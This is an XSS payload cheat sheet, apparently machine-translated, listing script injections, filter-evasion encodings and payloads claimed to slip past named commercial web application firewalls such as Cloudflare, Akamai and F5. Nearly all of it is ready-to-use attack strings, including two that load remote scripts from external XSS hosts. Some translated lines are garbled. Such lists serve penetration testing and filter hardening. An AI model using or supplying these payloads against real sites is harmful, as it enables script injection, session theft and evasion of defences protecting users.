1: Normal construction mode:

1. No filter, write directly:
<script>alert(1)</script>

2. Normal truncation:

"> <script>alert(1)</script>
'> <script>alert(1)</script>

3. No < > angle brackets

" onmouseover=alert(1) Space
' onmouseover=alert(1) Space
' onclick=alert(1) Space
" onfocus=alert(1) autofocus="

4. Inline framework injection

"><iframe src=javascript:alert(1)>

5. Hyperlink injection:
 

"> <a href="javascript:alert(1)">loophole</a>

6. Parentheses in alert(1): can be replaced by inverted single quotation marks: `; It can also be used/

7. When () and inverse single quotation marks are filtered, the following can be used:  

- <iframe srcdoc="<script>parent.alert&#40;1&#41;</script>"
- <svg><script>alert&#40;1&#41</script>

8. If there is an annotation, it can be used or <! ---! > bypass

9,str_ The replace () function is case sensitive

10. When blacklisting, you can use URL encoding and other encoding methods:
 

javascript:alert(1),javascript:alert'1'

11. Comments (/ /) and line feed / carriage return (% 0a/%0d) can be used to bypass various specified methods (for example, some parameters must be added or spaces cannot be entered)

12. External chain xss script:

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

13. IMG label type:

<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#x6A&#x61&#x76&#x61(16 (binary code)&#x58&#x53&#x53&#x27&#x29>

14. Embedded label:

<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">(Embedded coding label)
<IMG SRC="javascript:alert('XSS');">(Embedded line feed (embedded carriage return)

15. Double open brackets:
 

<<SCRIPT>alert("XSS");//<</SCRIPT>

16. BODY picture:
 

<BODY BACKGROUND="javascript:alert('XSS')">

17,IMG Dynsrc:
 

<IMG DYNSRC="javascript:alert('XSS')">

18,DIV background-image:

> <DIV STYLE="background-image:url(javascript:alert('XSS'))"> 

19. javascript link:

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> 

20,embed:
 

<embed src="javascript:alert(1)">

21,video:
 

<video onerror="alert(1)">

22. Unicode escape, hexadecimal escape and octal escape can be performed in JavaScript. In addition, redundant escape strings in the string will be ignored.

<script>a \u006cert(1) ;</script>
<script>eval(' a\u006cert(1) ');</script> 
<script>eval(' a\x6cert(1) ');</script> 
<script>eval(' a\154ert(1) ');</script>
<script>eval(' a\1\ert\(1\) ');</script>

2: Bypass mode

1. Double url encoding
Encode the% url into% 25. If the background has url decode for parameters again or url decode when outputting, you can bypass WAF.

2. base64 encoding
WAF does not intercept < >, but intercepts script onXXXX and bypasses it with base64.

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+"> 

3. HTML entity encoding bypass
(1) Explanation: entity coding was first proposed to avoid, for example, including double quotation marks in your double quotation marks in the input data, causing the browser to abnormally close the quotation marks you entered as the sister label of the previous quotation mark.

payload:

<a href='javascript:alert&#40;&#39;123&#39;&#41;'>hello</a> <a href="j&#97;vascript:alert&#0000040;'123'&#41;">hello</a> 

tip:
(2) In fact, the pseudo protocol js code in the tag can be quoted without double quotation marks.
After adding eval function (eval knows \ x hex octal \ u unicode encoding)

<a href="j&#97;vascript:eval('&#;\u0091\x65\x72\x74\x28\x22\x31\x22\x29')">hello</a> 

(3) If the page directly displays the input content, you can encode html first and then url

<svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>

4. Filter / script
 

<%2fscript>

<%252fscript>

<%252fScRipt>

<%252fScrIPt%20>

<%252fsCrIpt+ipT%20> 

5. Filter parentheses
When parentheses are filtered, throw can be used to bypass them
 

<a onmouseover="javascript:window.onerror=alert;throw 1>

<img src=x onerror="javascript:window.onerror=alert;throw 1"> 

6. Bypass with 0 bytes
 

<scri%00pt>alert(1);

</scri%00pt>

<scri\x00pt>alert(1);

</scri%00pt>

<s%00c%00r%00%00ip%00t>confirm(0);

</s%00c%00r%00%00ip%00t> 

7. Split and then combine
 

<script>var a='h';var b=':\/\/';document.write('<script src="'+a+'ttp'+b+'xss.tw/xxx"><\/script>');</script>

8. Using ascii coding to bypass
 

<img/ \/\μ src=x onerror=alert(1)//>

<img src=\x17\x17 onerror=alert(1)//>

<img/\%20src=%17y%17 onerror=%C2%A0alert(1)//> 

9. Filter parentheses and semicolons
You can use curly braces to isolate statements and put onerror as a whole in curly braces. This avoids the use of semicolons:
 

<script>{onerror=alert}throw 1337</script>

3: Common waf bypass

WAF name: Cloudflare
Payload: <a"/onclick=(confirm)()>click
 Bypass technology: non space filling

WAF name: Wordfence
Payload: <a/href=javascript&colon;alert()>click
 Bypass technology: digital character coding

WAF name: Barracuda
Payload: <a/href=&#74;ava%0a%0d%09script&colon;alert()>click
 Bypass technology: digital character coding

WAF name: Akamai
Payload: <d3v/onauxclick=[2].some(confirm)>click
 Bypass technology: lack of event handler in blacklist and confusion of function calls

WAF name: Comodo
Payload: <d3v/onauxclick=(((confirm)))">click
 Bypass technology: lack of event handler in blacklist and confusion of function calls

WAF name: F5
Payload: <d3v/onmouseleave=[2].some(confirm)>click
 Bypass technology: lack of event handler in blacklist and confusion of function calls

WAF name: ModSecurity
Payload: <details/open/ontoggle=alert()>
Bypass technology: missing tag or event handler in blacklist

WAF name: dotdefender
Payload: <details/open/ontoggle=(confirm)()//